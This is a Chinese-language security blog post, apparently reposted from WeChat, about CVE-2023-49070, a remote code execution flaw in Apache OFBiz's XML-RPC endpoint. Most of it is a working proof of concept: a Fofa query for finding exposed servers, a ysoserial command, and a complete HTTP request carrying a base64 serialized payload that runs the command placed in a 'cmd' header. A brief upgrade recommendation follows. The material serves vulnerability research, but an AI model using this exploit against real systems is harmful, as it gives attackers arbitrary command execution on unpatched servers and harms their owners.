(CVE-2023-49070)Apache OFBiz XML-RPC远程代码执行漏洞(附POC)

admin
admin
admin
102503
文章
87
评论
2023年12月18日13:30:41评论55 views字数 9683阅读32分16秒阅读模式

免责声明:该公众号大部分文章来自作者日常学习,也有部分文章是经过作者授权和其他公众号白名单转载,如需转载,请联系公众号。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

0x01 前言

Apache OFBiz 是一个开源的企业资源计划系统。Apache XML-RPC 是 XML-RPC 的 Java 实现,XML-RPC 是一种使用 XML over HTTP 来实现远程过程调用的协议。由于OFBiz使用了有反序列化漏洞且不再维护的的XML-RPC(CVE-2019-17570),攻击者可以通过请求/webtools/control/xmlrpc;/?USERNAME=&PASSWORD=s&requirePasswordChange=Y绕过针对/control/xmlrpc的接口过滤限制(CVE-2020-9496),从而使用 Apache XMLRPC 客户端库的应用程序权限执行任意代码。
0x02 影响平台

Apache OFBiz < 18.12.10

0x03 漏洞复现

Fofa:app="Apache_OFBiz"

首页:

(CVE-2023-49070)Apache OFBiz XML-RPC远程代码执行漏洞(附POC)

ysoserial生成回显payload

java -jar ysoserial-main-SNAPSHOT.jar CommonsBeanutils192NOCC "CLASS:TomcatCmdEcho" | base64 | tr -d "n"

构造数据包执行命令

(CVE-2023-49070)Apache OFBiz XML-RPC远程代码执行漏洞(附POC)

POC:

POST /webtools/control/xmlrpc;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1Host: Content-Type: application/xmlContent-Length: 8909cmd: echo "abc"
<?xml version="1.0"?><methodCall>  <methodName>ProjectDiscovery</methodName>  <params>    <param>      <value>        <struct>          <member>            <name>test</name>            <value>              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgAqamF2YS5sYW5nLlN0cmluZyRDYXNlSW5zZW5zaXRpdmVDb21wYXJhdG9ydwNcfVxQ5c4CAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAAFLHK/rq+AAAAMwEFCgBFAIkKAIoAiwoAigCMCgAdAI0IAHoKABsAjgoAjwCQCgCPAJEHAHsKAIoAkggAkwoAIACUCACVCACWBwCXCACYCABYBwCZCgAbAJoIAJsIAHAHAJwLABYAnQsAFgCeCABnCACfBwCgCgAbAKEHAKIKAKMApAgApQcApggApwoAIACoCACpCQAlAKoHAKsKACUArAgArQoArgCvCgAgALAIALEIALIIALMIALQIALUHALYHALcKADAAuAoAMAC5CgC6ALsKAC8AvAgAvQoALwC+CgAvAL8KACAAwAgAwQoAGwDCCgAbAMMIAMQHAGQKABsAxQgAxgcAxwgAyAgAyQcAygcBAwcAzAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAsTHlzb3NlcmlhbC9wYXlsb2Fkcy90ZW1wbGF0ZXMvVG9tY2F0Q21kRWNobzsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAzQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAIPGNsaW5pdD4BAAFlAQAgTGphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbjsBAANjbHMBABFMamF2YS9sYW5nL0NsYXNzOwEABHZhcjUBACFMamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbjsBAARjbWRzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEABnJlc3VsdAEAAltCAQAJcHJvY2Vzc29yAQASTGphdmEvbGFuZy9PYmplY3Q7AQADcmVxAQAEcmVzcAEAAWoBAAFJAQABdAEAEkxqYXZhL2xhbmcvVGhyZWFkOwEAA3N0cgEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAA29iagEACnByb2Nlc3NvcnMBABBMamF2YS91dGlsL0xpc3Q7AQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQABaQEABGZsYWcBAAFaAQAFZ3JvdXABABdMamF2YS9sYW5nL1RocmVhZEdyb3VwOwEAAWYBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAHdGhyZWFkcwEAE1tMamF2YS9sYW5nL1RocmVhZDsBAA1TdGFja01hcFRhYmxlBwDOBwDPBwDQBwCmBwCiBwCZBwCcBwBiBwDHBwDKAQAKU291cmNlRmlsZQEAElRvbWNhdENtZEVjaG8uamF2YQwARgBHBwDQDADRANIMANMA1AwA1QDWDADXANgHAM8MANkA2gwA2wDcDADdAN4BAARleGVjDADfAOABAARodHRwAQAGdGFyZ2V0AQASamF2YS9sYW5nL1J1bm5hYmxlAQAGdGhpcyQwAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDADhANYBAAZnbG9iYWwBAA5qYXZhL3V0aWwvTGlzdAwA4gDjDADbAOQBAAtnZXRSZXNwb25zZQEAD2phdmEvbGFuZy9DbGFzcwwA5QDmAQAQamF2YS9sYW5nL09iamVjdAcA5wwA6ADpAQAJZ2V0SGVhZGVyAQAQamF2YS9sYW5nL1N0cmluZwEAA2NtZAwA6gDrAQAJc2V0U3RhdHVzDADsAF4BABFqYXZhL2xhbmcvSW50ZWdlcgwARgDtAQAHb3MubmFtZQcA7gwA7wDwDADxAN4BAAN3aW4BAAdjbWQuZXhlAQACL2MBAAkvYmluL2Jhc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyDABGAPIMAPMA9AcA9QwA9gD3DABGAPgBAAJcQQwA+QD6DAD7AN4MAPwA/QEAJG9yZy5hcGFjaGUudG9tY2F0LnV0aWwuYnVmLkJ5dGVDaHVuawwA/gD/DAEAAQEBAAhzZXRCeXRlcwwBAgDmAQAHZG9Xcml0ZQEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BABNqYXZhLm5pby5CeXRlQnVmZmVyAQAEd3JhcAEAE2phdmEvbGFuZy9FeGNlcHRpb24BACp5c29zZXJpYWwvcGF5bG9hZHMvdGVtcGxhdGVzL1RvbWNhdENtZEVjaG8BAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAVamF2YS9sYW5nL1RocmVhZEdyb3VwAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBABBqYXZhL2xhbmcvVGhyZWFkAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAOZ2V0VGhyZWFkR3JvdXABABkoKUxqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdnZXROYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEADWdldFN1cGVyY2xhc3MBAARzaXplAQADKClJAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7AQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAB2lzRW1wdHkBAAMoKVoBAARUWVBFAQAEKEkpVgEAEGphdmEvbGFuZy9TeXN0ZW0BAAtnZXRQcm9wZXJ0eQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9T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</serializable>            </value>          </member>        </struct>      </value>    </param>  </params></methodCall>
0x04 修复建议

升级ofbiz18.12.10或更高版本:https://ofbiz.apache.org/
‍‍0x05 参考链接

https://www.oscs1024.com/hd/MPS-ope5-i4zj

原文始发于微信公众号(SheYin):(CVE-2023-49070)Apache OFBiz XML-RPC远程代码执行漏洞(附POC)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月18日13:30:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   (CVE-2023-49070)Apache OFBiz XML-RPC远程代码执行漏洞(附POC)http://cn-sec.com/archives/2312188.html

发表评论

匿名网友 填写信息